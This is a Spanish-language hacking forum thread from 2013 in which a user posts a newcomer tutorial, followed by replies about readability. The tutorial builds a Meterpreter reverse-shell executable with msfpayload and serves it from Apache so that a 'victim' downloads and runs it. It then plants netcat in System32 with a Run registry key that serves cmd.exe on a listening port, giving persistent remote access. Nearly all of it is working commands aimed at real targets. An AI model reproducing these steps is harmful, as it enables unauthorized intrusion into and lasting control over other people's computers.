comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Metasploit + meterpreter + nc backdoor

  • 5 Respuestas
  • 2936 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« en: Septiembre 18, 2013, 05:37:13 pm »
Antes que todo aclarar que este post es para Newbie (lo explico bien por eso)

Vale, empecemos; primero abrimos la consola y generamos un .exe con msfpayload
msfpayload windows/meterpreter/reverse_tcp lhost=tu ip pública lport=el puerto X > /root/Desktop/payload.exe

vale, ahora para mayor comodidad arrancaremos apache, y subiéremos el .exe.

A continuación pondremos a escuchar meterpreter, por lo que abrimos metasploit, seleccionamos el exploit

use exploit/multi/handler,

 en este caso usaré este payload, si vosotros encontráis alguno mejor podéis usarlo

set payload windows/meterpreter/reverse_tcp ahora marcamos el puerto y el host con:

set lhost (y tu ip o no-ip)set lport ( y el puerto) vale,

ahora le damos run con exploit -j Ok,

respecto a apache, abrimos el puerto 80, por que utilizaremos el no-ip como url para enviar el "troyano", una vez que tengamos meterpreter escuchando podemos pasarle la url a la víctima, por ejemplo: No tienes permisos para ver links. Registrate o Entra con tu cuenta (ya que es el nombre que le dimos anteriormente) una vez que nos aseguramos de que la víctima ha descargado el archivo y lo ha ejecutado, nos saldrá en la consola que se ha habierto una sesión, ponemos; sessions -i 1

Ahora para asegurarnos la víctima, le subiremos netcat (nc) con; upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\System32\\nc.exe en ese "código" hemos seleccionado nuestra ruta local, y la ruta de la víctima, ahora le añadiremos al registro

netcat; reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v Backdoor -d C:\\Windows\\System32\\nc.exe" -L -d  -p (un puerto diferente a el anterior ej: 4447) -e cmd.exe" vale, ahora subiremos el mismo "troyano" (para poder ejecutarlo con netcat, ya que solo tenemos acceso a la consola)con; upload /root/Desktop/payload.exe C:\\Windows\\System32\\payload.exe

Y yá esta, ahora guardaremos su ip en un txt, y cuando queramos conectarnos pondremos; nc (su ip) 4447 (que es el puerto)


Perdón si hice algo mal, no dudéis en comentarlo y si tenéis una duda igual...
« Última modificación: Septiembre 20, 2013, 01:54:09 am por ZanGetsu »
Skype: trollmine99

Desconectado CrazyKade

  • *
  • Underc0der
  • Mensajes: 182
  • Actividad:
    0%
  • Reputación 0
  • Я только знаю что ничего не знаю!
    • Ver Perfil
« Respuesta #1 en: Septiembre 18, 2013, 06:48:52 pm »
No puedo leer el post, me duelen los ojos con esa mala elección de colores sobre el texto. Para la próxima usa colores oscuros sobre fondo blanco. Saludos.-

CrazyKade

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« Respuesta #2 en: Septiembre 18, 2013, 06:56:41 pm »
Bueno primero lo siendo, mañana si puedo lo cambiaré y deberías mirar el brillo de tu pantalla por que para mi es legible totalmente o.O
Skype: trollmine99

Desconectado edelegg

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: edelegg
« Respuesta #3 en: Septiembre 19, 2013, 02:09:49 pm »
Buen post, me ha servido. Te sigo TrollMine. La verdad que cada vez me gustan más tus post.

Gracias ^^

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« Respuesta #4 en: Septiembre 20, 2013, 01:55:51 am »
hola, el contenido de tu post esta bueno, pero
deberías preocuparte un poco por el orden en el post y la legibilidad
edite un poco tu post, le quite las letras naranjas y le di un poco de espacio,
saludos y gracias !

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« Respuesta #5 en: Septiembre 20, 2013, 09:46:03 am »
Muchas gracias ZanGetsu :))
La verdad que estaba un poco amontonado
« Última modificación: Septiembre 20, 2013, 09:54:19 am por TrollMine »
Skype: trollmine99

 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1537
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 19255
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1884
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Usando PRY en el desarrollo de módulos para Metasploit.

Iniciado por morodog

Respuestas: 2
Vistas: 2584
Último mensaje Octubre 05, 2015, 10:42:08 pm
por Stuxnet
[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

Iniciado por CalebBucker

Respuestas: 4
Vistas: 4236
Último mensaje Diciembre 23, 2012, 10:08:37 pm
por CalebBucker